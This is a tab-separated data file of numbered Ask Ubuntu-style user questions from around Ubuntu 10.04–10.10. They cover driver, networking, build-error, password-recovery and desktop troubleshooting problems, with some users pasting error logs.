21175	what are the graphics capabilities of i915 driver ?	i would like to know if i915 driver support all the features of directfb . i dont know whether this is the right way to ask what i have in my mind . when i look at the code , i find that it support just 'fill rectangle ' and 'image blitting ' . is that all or does it support more ? please guide me . thanks , sen
21176	snap open not working for gedit 2.30.3	i followed the instructions given , but i 'm not able to get snap open to work on my ubuntu 10.10 . it was working on ubuntu 10.04 . any ideas ? thanks !
21177	missing icons and functions	i have installed nautilus elementary as per this instruction.installation went fine . but some of icons are missing . and there is no edit â preferences â tweaks tab . also the keyboard shortcuts f7 and f4 is not working . toolbar is not customizable . am i missing something ? . how can i make it work properly .
21182	how to change the default timeout of internet connection ?	i have an air 2.0 application which makes a request to the server which can take more than 1 minute . sadly due to this bug the request timeouts after 30 seconds . there is a workaround , but is only available for windows . could you tell me how to do the same thing in ubuntu 10.04 ?
21183	remap macbookpro alt and command keys ?	i 'm using ubuntu 10.10 on my macbookpro6.2 , and i 'd like to remap the following keys : right-alt - > right-cmd right-command ( apple key ) - > right-alt how do i do this ? thanks for all your help
21185	why do my window titles lag behind the window contents ?	the window title displayed in my maverick is often for the previous window . this is most noticeable in firefox after using the back key to go to the previous window , but it also happens in file search and various media players . this even occurs in brand new installs of maverick and linux mint 10 , so i know it has nothing to do with any configuration file snafu . i am using a toshiba satellite notebook with intel graphics . oddly enough , linux mint does not display this glitch when running in virtualbox ( do n't know about maverick in vbox ) . any help with this issue would be greatly appreciated .
21186	most commands wo n't do anything if i use the console at my ubuntu server . why ?	i 've bought a vps server a few days ago , with ubuntu on it , but i have a problem now . by nearly all the commands i put in i get this error : : command not found . i am logging in as root . i think this is the ubuntu version i have : ubuntu-8.04-i386-minimal . ( maybe it has to do with 'minimal ' ? i really do n't know . ) to be more specific , the command i have and try to run now is this , cd ~/mclawl screen -s mcforge -d -m -c /dev/null -- sh -c 'mono mcforge.exe exec $ shell' if i do so , i get this , -bash : screen : command not found
21188	how to repair/restore after 'sudo chmod / 777 ' ?	i changed file permissions recursively on the root directory '/ ' with sudo chmod / 777 -r and after that i run `` save mode '' and i was changed main directories like a sys , boot , root , etc using ( sudo chmod 440 /etc -r ) etc and after that ca n't boot system because many of process do n't have permissions . please help .
21192	screen resolution higher than monitor specs	is there any magical or non-magical way to increase screen resolution for my monitor that officially does 1366 x 768 ? with my graphics card , i could do 1920 , and when i actually do that , the image is very `` unclean '' on the screen ... i run ubuntu 10.10 , on an hp pavilion with a geforce 315 . my monitor is a hd ready samsung le32c450 ... my smaller previous monitor had no problem showing a 1920 resolution , and my obvious mishap was to assume a much bigger screen would support at least this same resolution ... any tips would be greatly appreciated !
21207	network manager troubleshooting	i 'm having some issues when connecting to my house 's wifi from my ubuntu 10.10 laptop . if the connection does n't exists , when selecting the network ( and after entering the wpa2 password ) i 'm able to connect . once the connection is saved , when trying to reconnect , network manager works for a minute or so and then fails ; the only way to reconnect then is to delete the saved connection and re-select the network from the list of available wireless networks . the same network works with no issues on the same laptop when running win7 , and on other wireless networks when running ubuntu . is there a network manager log which i can take a look at for troubleshooting the issue ? are there any tools for checking the wifi status ?
21208	how do i port my settings from my desktop to laptop	i am currently using ubuntu 10.04 installed on my desktop box . i have got a new laptop and i will be using it from now on . but i will have to do the setup all over again ( setting up applications/updates ) . plus many of my preferences and tweaks i 've had in my desktop will be lost and those too i will have to all over again . is there an easy way where i can just take image or something and use it in my laptop ? ? any help/pointers/links are much appreciated .
21211	how to set up dropbox on ubuntu server ?	i 've installed dropbox on ubuntu server 9.10 using these instructions , however i am struggling to find out what to do next . other help pages are related to those with a gui . running dropbox status returns : dropbox is n't responding ! how do i login to my existing dropbox account and choose a folder for it to start using ?
21216	i bought an album yesterday with 22 tracks on it , but only 10 show up for download	all 22 show up in the download queue within rhythmbox . the queuing feature never really works there anyway though , so i usually go to the web site , click on files/purchased music/band/track to get what i purchased . this has worked well for other albums , but 'greatest hit ... ( and 21 other pretty cool songs ) has been showing 10 tracks for the past 17 hours . any clues ?
21217	network manager , create multiple lan connection configuration for the same wired card	how can i create in network manager , multiple wired lan connection configuration for the same wired card ? i use to move between a lot of offices where i need to change my network config ( ip , mask , ecc ) is it possible to create or save different configurations for the same network card and activate the right one time by time ?
21221	how to redistribute binary programs built on modern ubuntu so that they can be executed on any older linux system ?	i found that if i build any binary on ubuntu 10.10 , then it does n't execute on some older linuxes . it is because ubuntu uses a very new c library , called eglibc . most of the desktop linux systems use glibc . i would like to know whether there is any standard method how to redistribute binary programs built on a modern ubuntu so that they can be executed on any older linux system ? how to find all required dependencies ( glibc version , dynamic libraries ) ?
21223	how do i reset my password ?	i inherited a machine with ubuntu desktop installed . it has a password in place and i have no idea what the password may be . i can not get to the command line to use the methods i have found online . no matter how many times i press `` shift '' during the boot process it still goes all the way to the desktop login . i never see grub . i am not sure which version i have but i think may be 9 or 10 . thanks doug ok , chapter ii i have 10.04.1 , btw . i tried holding the shift key down and got to the boot menu . mine was titled gnu grub 1.98-1unbuntu7 it has several kernels listed but none say ... ubuntu , kernel . instead mine says ( along with several older versions ) ubuntu , with linux 2.6.32-24-generic . i pressed 'e ' on that one anyway and got a page that shows : recordfail insmod ext2 set root = ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set ( long id number ) linux /boot/vmlinuz-2.6.32-24-generic root=uuid ( same long number ) ro quiet splash initrd /boot/initrd.img-2.6.32-24-generic when i try to addd rw init=/bin/bash and hit esc , then e again it is gone . if i try to reboot ( ctrl-x ) after entering the above it goes to the locked desktop . i also tried the live cd ( i have 8.04.1 on cd ) . that worked , up until i tried to mount the existing hd . it said it was ext4 and was not compatible . i used the partition manager and it showed that partition was ext3 . { shrug } i booted into recovery mode and can get to the root command line . it shows the machine name but i am not sure where i need to go from there though to find the user info . maybe cd /dev/sdb ? ? i know root is a no-no and i do n't want to break it .. . i just want to get in and not have to reinstall ! thanks doug
21225	how to apply a patch to indicator applet ?	i have a patch named `` incator.patch '' . how can i apply that to the application `` indicator applet '' and get it running ? the bug will solve a bug with key-binding caused by `` indicator applet '' . patch is here : launchpadlibrarian.net/52193166/hotkey.patch .
21231	why is mysql unable to configure ?	i try to install mysql-server on my ubuntu vps server , and it 's able to install , but not to configure . if it tries to configure i get this : > ... fail ! invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.0 ( -- configure ) : subprocess post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.0 ; however : package mysql-server-5.0 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mysql-server-5.0 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does someone know a solution to this ? btw , my other question can be closed , it 's solved , but i cant comment on it anymore .
21234	how to write an internationalized manual using gettext ?	i need to write a manual to the software i made . if it possible to use gettext when writing a manual , or other documents ?
21237	problems with subversion ( in gnome keyring , maybe ) , user=null	i 'm having a problem with my subversion in ubuntu , and it 's happening only on my computer , my colleagues are working fine . it asks for password for user `` ( null ) '' : password for ' ( null ) ' gnome keyring : entering the password it shows : svn : options of 'http : //10.0.203.3/greenfox ' : authorization failed : could not authenticate to server : rejected basic challenge ( http : //10.0.203.3 ) what can be causing that ( again : it 's just on my computer , the svn server is ok ) .
21238	how to install wireless antenna tp-link tl-wn722n ?	tp-link tl-wn722n is a usb antenna for wireless network . the antenna cames with a cd for windows ( and works just fine ) , but how can i install it on ubuntu ? it 's not recognizing alone .
21243	creating an install of ubuntu to clone	i work on a team with several other developers . we all have similar hardware and we all run at least the same base development software . we are wishing to upgrade from 10.04 to 10.10 doing a clean install . i am looking for a way to do a base install of ubuntu , including all our common applications , then clone it to each of the developers drives and then let them further customize their own install . some considerations would be giving the developer the ability to have their own person id and not the same as which the base install was done with . i know they do this on vmware installs and corporate installs of windows that can then be customized , but i have not seen this done with ubuntu yet . thanks
21249	where can i see a list of supported bluetooth drivers ?	where can i see a list of supported bluetooth drivers ?
21252	anti-aliasing changed after update ( or something ... )	the anti-aliasing of my system ( of gtk ? ) has gone weird after i did one of two things - do a system update , and install gimp 2.7 beta . see images : before : after : before : after : here 's the current rendering comparison between chromium , firefox and opera ( in that order ) : does anyone know how i can get the old anti-aliasing back ? as far as i can tell , i never did anything special to achieve that before . it has always been on the default settings since i installed lucid few months ago . update : i have tried different settings ( even though i knew they were already at the `` best '' settings ) in appearance > fonts ( > details ) but , as expected , any change there only makes things worse . update 2 : one/some of these packages are to blame i 'm sure : libc-bin ( 2.11.1-0ubuntu7.6 ) to 2.11.1-0ubuntu7.7 libc-dev-bin ( 2.11.1-0ubuntu7.6 ) to 2.11.1-0ubuntu7.7 libc6 ( 2.11.1-0ubuntu7.6 ) to 2.11.1-0ubuntu7.7 libc6-dev ( 2.11.1-0ubuntu7.6 ) to 2.11.1-0ubuntu7.7 libc6-i686 ( 2.11.1-0ubuntu7.6 ) to 2.11.1-0ubuntu7.7 libcairo2 ( 1.8.10-2ubuntu1 ) to 1.9.6-6~mrw4 libcairo2-dev ( 1.8.10-2ubuntu1 ) to 1.9.6-6~mrw4 libgegl-0.0-0 ( 0.0.22-0ubuntu4 ) to 0.1.3-2010091001~ll liblcms1 ( 1.18.dfsg-1ubuntu2 ) to 1.18.dfsg-1ubuntu2.10.04.1
21254	how to stop running pidgin at logins and disable window hiding feature ?	every time i login into my desktop , pidgin start behind , and sometimes it 's annoying me - e.g . when i 'm not connected to internet or when i do n't want to be on-line - i check startup application list and there 's no pidgin listed . another thing that is very annoying is hiding window feature or what ever it called . assume that you 're using musictracker plug-in , your status is busy and you 're chatting with someone . when music change , status will change , and then buddy-list will disappear and chat window will minimize . buddy-list is not important but minimizing chat window when you 're chatting is annoying , is there any way to make pidgin stop that ?
21256	upstart on 8.04	my understanding is that upstart is installed on 8.04 , but it 's different than 10.04 . i 'm having trouble finding documentation on how to start/stop/check services from the command line for 8.04 . i 'm seeing some scripts in /etc/event.d ( e.g . : rcs , which afaik starts the old init.d scripts ) , but i do n't have commands like start/stop/status . can someone help me put the pieces together ?
21257	bash script : how to execute commands consecutively without waiting for the previous one ?	in a bash script that execute 2 commands like this # ! /bin/bash gedit nautilus nautilus starts not before gedit is closed ? how can i avoid this ?
21261	desktop couch scratch folder	in the `` desktop couch scratch '' folder , do i have to manually add the bookmarks i want saved , or does the system do it automatically ?
21262	shell command to bring a program window in front of another ?	does a shell command exist to bring a already started program in gnome in the front of another . i.e . : gedit and nautilus are started . nautilus is in the background and gedit in the foreground . how to i bring nautilus in the front with a shell command ?
21263	avoid dialogue by opening a shell script ?	when i have an executable script and i runs it by double-clicking it in gnome . it opens a dialoguebox that asks , what is intended to do : execute in terminal view cancel execute is there a way to avoid this question in for certain selected scripts ?
21264	how to open wubi 's .disk files under windows ?	wubi has created one big file with whole ubuntu installation root.disk - there are some files i have left on my linux partition that i would like to access from windows partition , is there any way to mount/open this file under windows ? p.s . i think its ubuntu question , because wubi is a windows compatible linux .
21267	why does n't the installer see all of my hard drives ?	i 'm trying to setup a dual boot system with windows vista 64 ( already installed ) and ubuntu 10.10 . i added a new drive which is identical to the one vista is installed on . when i boot into the livecd i can see and mount the second drive and edit it in gparted . however , when i use the installer it will only bring up the drive that already has vista installed . i 've tried everything i know . i 'm not sure if its a bios setting or something else i 've missed . i 've also tried both the desktop and alternate amd64 installs with the same result .
21279	is it possible to get xrandr to see two separate outputs with the nvidia driver ?	i have two monitors , which i have set up with nvidia-settings in twinview . the result : when i want to do something in xrandr , it does not function . it does n't report one output per video card head , but a single output mapped to the combined area of both monitors : rumtscho @ bradbury : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 3840 x 1440 , current 3840 x 1440 , maximum 3840 x 1440 default connected 3840x1440+0+0 0mm x 0mm 3840x1440 50.0* now i promised somebody to help test a driver . the developer is using an open source driver for intel video cards , and his driver assumes that there is more than one xrandr output , each mapped to a monitor . so i tried rewriting my xorg.conf to somehow get two outputs to show up , but failed . googling showed that people faced with the xrandr-nvidia problem either stopped using xrandr and achieved what they needed with nvidia-settings , or changed their driver to nouveau . the first is not going to help in my situation , and i am not willing to give up the proprietary driver , because compiz wo n't work without it . so does anybody know a way to get nvidia to actually pass on information on outputs to xrandr ?
21281	building awesome wm	i am following these steps in order to build awesome window manager on 10.04 i am building 3.4 while the tutorial is for 3.1 i installed all of the specified dependencies including cairo . after running cd awesome-3.4 & & make i get the following missing dependencies error : running cmake… -- cat - > /bin/cat -- ln - > /bin/ln -- grep - > /bin/grep -- git - > /usr/bin/git -- hostname - > /bin/hostname -- gperf - > /usr/bin/gperf -- asciidoc - > /usr/bin/asciidoc -- xmlto - > /usr/bin/xmlto -- gzip - > /bin/gzip -- lua - > /usr/bin/lua -- luadoc - > /usr/bin/luadoc -- convert - > /usr/bin/convert -- checking for modules 'glib-2.0 ; cairo ; x11 ; pango > =1.19.3 ; pangocairo > =1.19.3 ; xcb-randr ; xcb-xtest ; xcb-xinerama ; xcb-shape ; xcb-event > =0.3.6 ; xcb-aux > =0.3.0 ; xcb-atom > =0.3.0 ; xcb-keysyms > =0.3.4 ; xcb-icccm > =0.3.6 ; xcb-image > =0.3.0 ; xcb-property > =0.3.0 ; cairo-xcb ; libstartup-notification-1.0 > =0.10 ; xproto > =7.0.15 ; imlib2 ; libxdg-basedir > =1.0.0' -- package 'xcb-xtest ' not found -- package 'xcb-property > =0.3.0 ' not found -- package 'libstartup-notification-1.0 > =0.10 ' not found -- package 'libxdg-basedir > =1.0.0 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:259 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:311 ( _pkg_check_modules_internal ) awesomeconfig.cmake:133 ( pkg_check_modules ) cmakelists.txt:15 ( include ) cmake error at awesomeconfig.cmake:157 ( message ) : call stack ( most recent call first ) : cmakelists.txt:15 ( include ) -- configuring incomplete , errors occurred ! make : * [ cmake ] error 1 i ran sudo apt-get install libxcb-xtest0 libxcb-property1 libxdg-basedir1 libstartup-notification0 but the problem is still there . it is probably because apt-get uses different names for these libraries . please advise edit following enzotib 's suggestion , i ran : sudo apt-get install libxcb-xtest0-dev libxcb-property1-dev libxdg-basedir-dev libstartup-notification0-dev and now it looks like i 'm missing a library : awesome-3.4 $ make running cmake… -- cat - > /bin/cat -- ln - > /bin/ln -- grep - > /bin/grep -- git - > /usr/bin/git -- hostname - > /bin/hostname -- gperf - > /usr/bin/gperf -- asciidoc - > /usr/bin/asciidoc -- xmlto - > /usr/bin/xmlto -- gzip - > /bin/gzip -- lua - > /usr/bin/lua -- luadoc - > /usr/bin/luadoc -- convert - > /usr/bin/convert -- configuring lib/naughty.lua -- configuring lib/awful/tooltip.lua -- configuring lib/awful/init.lua -- configuring lib/awful/titlebar.lua -- configuring lib/awful/key.lua -- configuring lib/awful/mouse/init.lua -- configuring lib/awful/mouse/finder.lua -- configuring lib/awful/autofocus.lua -- configuring lib/awful/screen.lua -- configuring lib/awful/rules.lua -- configuring lib/awful/widget/init.lua -- configuring lib/awful/widget/taglist.lua -- configuring lib/awful/widget/graph.lua -- configuring lib/awful/widget/tasklist.lua -- configuring lib/awful/widget/common.lua -- configuring lib/awful/widget/prompt.lua -- configuring lib/awful/widget/launcher.lua -- configuring lib/awful/widget/button.lua -- configuring lib/awful/widget/layoutbox.lua -- configuring lib/awful/widget/layout/init.lua -- configuring lib/awful/widget/layout/vertical.lua -- configuring lib/awful/widget/layout/horizontal.lua -- configuring lib/awful/widget/layout/default.lua -- configuring lib/awful/widget/progressbar.lua -- configuring lib/awful/widget/textclock.lua -- configuring lib/awful/dbus.lua -- configuring lib/awful/remote.lua -- configuring lib/awful/client.lua -- configuring lib/awful/prompt.lua -- configuring lib/awful/completion.lua -- configuring lib/awful/tag.lua -- configuring lib/awful/util.lua -- configuring lib/awful/button.lua -- configuring lib/awful/menu.lua -- configuring lib/awful/hooks.lua -- configuring lib/awful/wibox.lua -- configuring lib/awful/layout/init.lua -- configuring lib/awful/layout/suit/init.lua -- configuring lib/awful/layout/suit/floating.lua -- configuring lib/awful/layout/suit/fair.lua -- configuring lib/awful/layout/suit/spiral.lua -- configuring lib/awful/layout/suit/magnifier.lua -- configuring lib/awful/layout/suit/tile.lua -- configuring lib/awful/layout/suit/max.lua -- configuring lib/awful/placement.lua -- configuring lib/awful/startup_notification.lua -- configuring lib/beautiful.lua -- configuring themes/zenburn//theme.lua -- configuring themes/default//theme.lua -- configuring themes/sky//theme.lua -- configuring config.h -- configuring awesomerc.lua -- configuring awesome-version-internal.h -- configuring awesome.doxygen -- configuring done -- generating done -- build files have been written to : /home/druden/util/awesome-3.4/.build-vedroid-i486-linux-gnu-4.4.3 running make makefile… building… [ 4 % ] built target generated_sources [ 5 % ] building c object cmakefiles/awesome.dir/awesome.c.o in file included from /home/druden/util/awesome-3.4/spawn.h:25 , from /home/druden/util/awesome-3.4/awesome.c:33 : /home/druden/util/awesome-3.4/globalconf.h:57 : error : expected specifier-qualifier-list before ‘xcb_event_handlers_t’ in file included from /home/druden/util/awesome-3.4/awesome.c:34 : /home/druden/util/awesome-3.4/client.h : in function ‘client_stack’ : /home/druden/util/awesome-3.4/client.h:212 : error : ‘awesome_t’ has no member named ‘client_need_stack_refresh’ /home/druden/util/awesome-3.4/client.h : in function ‘client_raise’ : /home/druden/util/awesome-3.4/client.h:227 : error : ‘awesome_t’ has no member named ‘stack’ in file included from /home/druden/util/awesome-3.4/awesome.c:42 : /home/druden/util/awesome-3.4/titlebar.h : in function ‘titlebar_update_geometry’ : /home/druden/util/awesome-3.4/titlebar.h:150 : error : ‘awesome_t’ has no member named ‘l’ /home/druden/util/awesome-3.4/titlebar.h:151 : error : ‘awesome_t’ has no member named ‘l’ /home/druden/util/awesome-3.4/titlebar.h:152 : error : ‘awesome_t’ has no member named ‘l’ in file included from /home/druden/util/awesome-3.4/awesome.c:47 : /home/druden/util/awesome-3.4/common/xutil.h : in function ‘xutil_get_text_property_from_reply’ : /home/druden/util/awesome-3.4/common/xutil.h:39 : warning : ‘string’ is deprecated ( declared at /usr/local/include/xcb/xcb_atom.h:83 ) /home/druden/util/awesome-3.4/common/xutil.h : at top level : /home/druden/util/awesome-3.4/common/xutil.h:60 : error : expected ‘ ) ’ before ‘*’ token /home/druden/util/awesome-3.4/awesome.c : in function ‘awesome_atexit’ : /home/druden/util/awesome-3.4/awesome.c:65 : error : ‘awesome_t’ has no member named ‘hooks’ /home/druden/util/awesome-3.4/awesome.c:66 : error : ‘awesome_t’ has no member named ‘l’ /home/druden/util/awesome-3.4/awesome.c:66 : error : ‘awesome_t’ has no member named ‘hooks’ /home/druden/util/awesome-3.4/awesome.c:68 : error : ‘awesome_t’ has no member named ‘l’ /home/druden/util/awesome-3.4/awesome.c:73 : error : ‘awesome_t’ has no member named ‘embedded’ /home/druden/util/awesome-3.4/awesome.c:76 : error : ‘awesome_t’ has no member named ‘embedded’ /home/druden/util/awesome-3.4/awesome.c:77 : error : ‘awesome_t’ has no member named ‘embedded’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:89 : warning : type defaults to ‘int’ in declaration of ‘c’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:89 : error : ‘awesome_t’ has no member named ‘clients’ /home/druden/util/awesome-3.4/awesome.c:91 : error : invalid type argument of ‘unary *’ ( have ‘int’ ) /home/druden/util/awesome-3.4/awesome.c:92 : error : invalid type argument of ‘unary *’ ( have ‘int’ ) /home/druden/util/awesome-3.4/awesome.c:96 : error : ‘awesome_t’ has no member named ‘l’ /home/druden/util/awesome-3.4/awesome.c : in function ‘a_xcb_check_cb’ : /home/druden/util/awesome-3.4/awesome.c:223 : warning : implicit declaration of function ‘xcb_event_handle’ /home/druden/util/awesome-3.4/awesome.c:223 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:230 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c : in function ‘awesome_restart’ : /home/druden/util/awesome-3.4/awesome.c:277 : error : ‘awesome_t’ has no member named ‘argv’ /home/druden/util/awesome-3.4/awesome.c : in function ‘xerror’ : /home/druden/util/awesome-3.4/awesome.c:305 : error : ‘xcb_event_error_bad_window’ undeclared ( first use in this function ) /home/druden/util/awesome-3.4/awesome.c:305 : error : ( each undeclared identifier is reported only once /home/druden/util/awesome-3.4/awesome.c:305 : error : for each function it appears in . ) /home/druden/util/awesome-3.4/awesome.c:306 : error : ‘xcb_event_error_bad_match’ undeclared ( first use in this function ) /home/druden/util/awesome-3.4/awesome.c:308 : error : ‘xcb_event_error_bad_value’ undeclared ( first use in this function ) /home/druden/util/awesome-3.4/awesome.c : in function ‘main’ : /home/druden/util/awesome-3.4/awesome.c:369 : error : ‘awesome_t’ has no member named ‘keygrabber’ /home/druden/util/awesome-3.4/awesome.c:370 : error : ‘awesome_t’ has no member named ‘mousegrabber’ /home/druden/util/awesome-3.4/awesome.c:376 : error : ‘awesome_t’ has no member named ‘argv’ /home/druden/util/awesome-3.4/awesome.c:377 : error : ‘awesome_t’ has no member named ‘argv’ /home/druden/util/awesome-3.4/awesome.c:381 : error : ‘awesome_t’ has no member named ‘argv’ /home/druden/util/awesome-3.4/awesome.c:382 : error : ‘awesome_t’ has no member named ‘argv’ /home/druden/util/awesome-3.4/awesome.c:424 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:425 : error : ‘awesome_t’ has no member named ‘timer’ /home/druden/util/awesome-3.4/awesome.c:431 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:432 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:433 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:434 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:435 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:436 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:443 : error : ‘awesome_t’ has no member named ‘default_screen’ /home/druden/util/awesome-3.4/awesome.c:450 : error : ‘awesome_t’ has no member named ‘have_xtest’ /home/druden/util/awesome-3.4/awesome.c:462 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:464 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:465 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:467 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:468 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:471 : warning : implicit declaration of function ‘xcb_event_handlers_init’ /home/druden/util/awesome-3.4/awesome.c:471 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:472 : warning : implicit declaration of function ‘xutil_error_handler_catch_all_set’ /home/druden/util/awesome-3.4/awesome.c:472 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:490 : warning : implicit declaration of function ‘xcb_event_poll_for_event_loop’ /home/druden/util/awesome-3.4/awesome.c:490 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:493 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:496 : error : ‘awesome_t’ has no member named ‘keysyms’ /home/druden/util/awesome-3.4/awesome.c:507 : error : ‘awesome_t’ has no member named ‘colors’ /home/druden/util/awesome-3.4/awesome.c:510 : error : ‘awesome_t’ has no member named ‘colors’ /home/druden/util/awesome-3.4/awesome.c:513 : error : ‘awesome_t’ has no member named ‘font’ /home/druden/util/awesome-3.4/awesome.c:519 : error : ‘awesome_t’ has no member named ‘keysyms’ /home/druden/util/awesome-3.4/awesome.c:519 : error : ‘awesome_t’ has no member named ‘numlockmask’ /home/druden/util/awesome-3.4/awesome.c:520 : error : ‘awesome_t’ has no member named ‘shiftlockmask’ /home/druden/util/awesome-3.4/awesome.c:520 : error : ‘awesome_t’ has no member named ‘capslockmask’ /home/druden/util/awesome-3.4/awesome.c:521 : error : ‘awesome_t’ has no member named ‘modeswitchmask’ /home/druden/util/awesome-3.4/awesome.c:563 : error : ‘awesome_t’ has no member named ‘evenths’ /home/druden/util/awesome-3.4/awesome.c:572 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:575 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:576 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:577 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:578 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:579 : error : ‘awesome_t’ has no member named ‘loop’ /home/druden/util/awesome-3.4/awesome.c:580 : error : ‘awesome_t’ has no member named ‘loop’ make [ 3 ] : * [ cmakefiles/awesome.dir/awesome.c.o ] error 1 make [ 2 ] : [ cmakefiles/awesome.dir/all ] error 2 make [ 1 ] : [ all ] error 2 make : * [ cmake-build ] error 2
21284	how do i troubleshoot my computer not suspending automatically ?	i can use suspend without any problem if i do it manually . it resumes ok as well . however , for some reason it has stopped doing this automatically . right now it is set to suspend after 30 minutes but it can be idle for hours without suspending .
21286	how to prevent battery from charging while on ups	i 'm running on ups power and would like to prevent the laptop 's battery from charging , to increase the amount of power available to other devices . is there a way to do this ? update the machine is a dell latitude d400 . if people want more details , just ask . also , i 'm gathering that i need to explain my desired setup a little better . i 've gotten a bunch of suggestions about taking the battery out . i 'm not sure if people are suggesting to take the battery out while the machine is running â this , as i understand , is not a good idea with most laptops â or to just remove the battery altogether . the latter option is not optimal , because ideally i 'd like to use the 30-60 minutes of power in the laptop battery and then switch over to ups power . the details of the switch-over may constitute a separate question , but if i ca n't find a way to keep the laptop battery from charging , then removing the battery from the machine altogether may be the best way to do this . i 'm not sure yet if this machine will run without a battery , but i 'll check that out . other than the laptop , the ups is just supporting a cable modem and router and a usb hub . again in the idealized version of this setup , all the power management changes would be automated , i.e . not require replugging anything or pressing fn-keys . i 'd like the machine to start using laptop battery power when apcupsd indicates that the ups a/c is out , and then start using ups power , but not charging the battery , when the battery is almost depleted .
21287	ubuntu freezes when gdm starts	i have ubuntu 10.10 ( upgraded from 10.04 ) i was browsing in firefox yesterday , then the pc suddenly did a reset once it restarted , everything went normal until gdm begun showing . then everything froze and locked when userlist showed . i ca n't move mouse pointer nor do anything with keyboard at this point ( just after userlist shows in gdm ) . ps : both , mouse and keyboard work fine , because this ubuntu is dual-booting with a windows xp install which loads/works fine . here is my .xsession-errors file , but i do n't have a clue what may be wrong . thanks http : //pastebin.com/gvtneeaf
21290	which aliases do you find most useful or helpful to your ubuntu experience ?	since first becoming an ubuntu user i have developed a growing list of aliases , and there are some that i can not imagine being without . this makes me think that there are probably still tons of aliases that i have n't thought to use which could make the lives of me and fellow ubuntu users easier . what aliases do you guys use which are : general - they apply to lots of users helpful - you use them often or they save a lot of time when you do use them
21295	mouse pointer strange problem	i have last ubuntu installed ( 10.10 ) , but from an year and thousand updates , video drivers updates , an hundreds of tricks , the mouse pointer is showed like an ugly square ... these are the screenshots : i have no idea what to do to solve this problem . anyone of you have an idea to solve it ? edit : this problem was encountered from 8.10+ ! edit 2 , video card specifications : paska @ ubuntu : ~ $ hwinfo -- gfxcard 35 : pci 100.0 : 0300 vga compatible controller ( vga ) [ created at pci.318 ] udi : /org/freedesktop/hal/devices/pci_1106_3230 unique id : vcu0.qx54agqkwee parent id : vskl.cp+qxddqow8 sysfs id : /devices/pci0000:00/0000:00:01.0/0000:01:00.0 sysfs busid : 0000:01:00.0 hardware class : graphics card model : `` via k8m890ce/k8n890ce [ chrome 9 ] '' vendor : pci 0x1106 `` via technologies , inc. '' device : pci 0x3230 `` k8m890ce/k8n890ce [ chrome 9 ] '' subvendor : pci 0x1043 `` asustek computer inc. '' subdevice : pci 0x81b5 revision : 0x11 memory range : 0xd0000000-0xdfffffff ( rw , prefetchable ) memory range : 0xfa000000-0xfaffffff ( rw , non-prefetchable ) memory range : 0xfbcf0000-0xfbcfffff ( ro , prefetchable , disabled ) irq : 16 ( 10026 events ) i/o ports : 0x3c0-0x3df ( rw ) module alias : `` pci : v00001106d00003230sv00001043sd000081b5bc03sc00i00 '' driver info # 0 : driver status : viafb is not active driver activation cmd : `` modprobe viafb '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 17 ( pci bridge ) primary display adapter : # 35 paska @ ubuntu : ~ $ thanks , a
